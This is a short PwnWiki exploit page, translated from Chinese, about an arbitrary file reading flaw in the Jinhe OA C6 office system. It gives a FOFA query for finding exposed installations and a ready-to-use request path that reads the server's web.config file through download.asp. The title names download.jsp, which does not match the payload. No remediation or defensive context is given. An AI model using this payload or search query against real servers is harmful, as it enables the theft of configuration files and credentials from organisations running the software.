Jinhe OA C6 download.jsp arbitrary file reading vulnerability

From PwnWiki

This page is a translated version of the page 金和OA C6 download.jsp 任意文件讀取漏洞 and the translation is 100% complete.

Other languages:

Chinese • ‎English • ‎中文（中国大陆）‎

Vulnerability Impact

Jinhe OA

FOFA

app="Jinher-OA"

Payload

/C6/Jhsoft.Web.module/testbill/dj/download.asp?filename=/c6/web.config

Read web.config

/C6/Jhsoft.Web.module/testbill/dj/download.asp?filename=/c6/web.config

Retrieved from "https://pwnwiki.com/index.php?title=金和OA_C6_download.jsp_任意文件讀取漏洞/en&oldid=5836"